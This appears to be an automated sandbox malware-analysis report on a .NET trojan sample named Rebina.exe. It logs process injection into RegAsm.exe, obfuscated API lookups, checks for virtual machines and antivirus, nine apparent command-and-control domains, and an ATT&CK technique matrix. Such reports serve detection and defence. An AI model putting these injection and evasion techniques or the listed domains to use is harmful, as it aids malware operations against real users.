    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00409990 appears 121 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004092A0 appears 35 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 1624
    Source: Rebina.exe, 00000000.00000002.2065241639.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Rebina.exe
    Source: Rebina.exe, 00000000.00000000.2062777864.00000000006CA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVQP.exeH vs Rebina.exe
    Source: Rebina.exeBinary or memory string: OriginalFilenameVQP.exeH vs Rebina.exe
    Source: Rebina.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Rebina.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winEXE@9/6@1/1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042AC4C CoCreateInstance,4_2_0042AC4C
    Source: C:\Users\user\Desktop\Rebina.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Rebina.exe.logJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeMutant created: NULL
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5232
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\0e27efbd-8f13-43d4-9bb1-3ed99251db98Jump to behavior
    Source: Rebina.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: Rebina.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    Source: C:\Users\user\Desktop\Rebina.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Rebina.exeVirustotal: Detection: 60%
    Source: unknownProcess created: C:\Users\user\Desktop\Rebina.exe "C:\Users\user\Desktop\Rebina.exe"
    Source: C:\Users\user\Desktop\Rebina.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Rebina.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    Source: C:\Users\user\Desktop\Rebina.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    Source: C:\Users\user\Desktop\Rebina.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 1624
    Source: C:\Users\user\Desktop\Rebina.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: Rebina.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: Rebina.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Rebina.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: c:\388fm14yqlq\obj\Release\doX.pdb source: Rebina.exe
    Source: Binary string: c:\388fm14yqlq\obj\Release\doX.pdbP source: Rebina.exe
    Source: C:\Users\user\Desktop\Rebina.exeCode function: 0_2_00E108E0 push ss; retf 0_2_00E108E2
    Source: C:\Users\user\Desktop\Rebina.exeCode function: 0_2_00E10568 push ebx; retf 0_2_00E10572
    Source: C:\Users\user\Desktop\Rebina.exeCode function: 0_2_00E10558 push ebx; retf 0_2_00E10562
    Source: C:\Users\user\Desktop\Rebina.exeCode function: 0_2_00E108D8 push ss; retf 0_2_00E108DA
    Source: C:\Users\user\Desktop\Rebina.exeCode function: 0_2_00E11135 push ebx; retf 0_2_00E11136
    Source: C:\Users\user\Desktop\Rebina.exeCode function: 0_2_00E10EB7 push edx; retf 0_2_00E11076
    Source: C:\Users\user\Desktop\Rebina.exeCode function: 0_2_00E112BB push ebx; retf 0_2_00E112BE
    Source: C:\Users\user\Desktop\Rebina.exeCode function: 0_2_00E10588 push ebp; retf 0_2_00E10592
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00440760 push ecx; retf 4_2_00440761
    Source: Rebina.exeStatic PE information: section name: .text entropy: 7.994595123284687
    Source: C:\Users\user\Desktop\Rebina.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeMemory allocated: E10000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeMemory allocated: 10F0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\Rebina.exe TID: 6204Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5680Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\Rebina.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: Amcache.hve.8.drBinary or memory string: VMware
    Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: RegAsm.exe, 00000004.00000002.2248451370.0000000001046000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW^
    Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.8.drBinary or memory string: vmci.sys
    Source: Amcache.hve.8.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.8.drBinary or memory string: VMware20,1
    Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_4-12439
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004358B0 LdrInitializeThunk,4_2_004358B0
    Source: C:\Users\user\Desktop\Rebina.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Rebina.exe, Program.csReference to suspicious API methods: InterfaceLoader.VirtualProtectEx(uint.MaxValue, ref AIOsncoiuuA[0], AIOsncoiuuA.Length, 64u, ref old)
    Source: Rebina.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("us" + "ER32.Dcc".Replace('c', 'l').ToLower()), @string)
    Source: Rebina.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("us" + "ER32.Dcc".Replace('c', 'l').ToLower()), @string)
    Source: Rebina.exe, Program.csReference to suspicious API methods: InterfaceLoader.CreateRemoteThread(uint.MaxValue, 0u, 0u, ref AIOsncoiuuA[num40], MoveAngles.userBuffer, 0, ref QoewnxZjAbqui)
    Source: C:\Users\user\Desktop\Rebina.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeCode function: 0_2_02AC249D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_02AC249D
    Source: C:\Users\user\Desktop\Rebina.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
    Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: caffegclasiqwp.shop
    Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stamppreewntnq.shop
    Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stagedchheiqwo.shop
    Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: millyscroqwp.shop
    Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: evoliutwoqm.shop
    Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: condedqpwqm.shop
    Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: traineiwnqo.shop
    Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: locatedblsoqp.shop
    Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: assumptionflattyou.shop
    Source: C:\Users\user\Desktop\Rebina.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 439000Jump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000Jump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000Jump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A06008Jump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Rebina.exeQueries volume information: C:\Users\user\Desktop\Rebina.exe VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Rebina.exe, 00000000.00000002.2065241639.0000000000E62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
    Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Rebina.exe, 00000000.00000002.2065241639.0000000000E62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVP.exe
    Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API
    1
    DLL Side-Loading
    411
    Process Injection
    1
    Masquerading
    OS Credential Dumping21
    Security Software Discovery
    Remote Services1
    Screen Capture
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Disable or Modify Tools
    LSASS Memory41
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Archive Collected Data
    2
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
    Virtualization/Sandbox Evasion
    Security Account Manager12
    System Information Discovery
    SMB/Windows Admin Shares2
    Clipboard Data
    113
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
    Process Injection
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Deobfuscate/Decode Files or Information
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
    Obfuscated Files or Information
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
    Software Packing
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
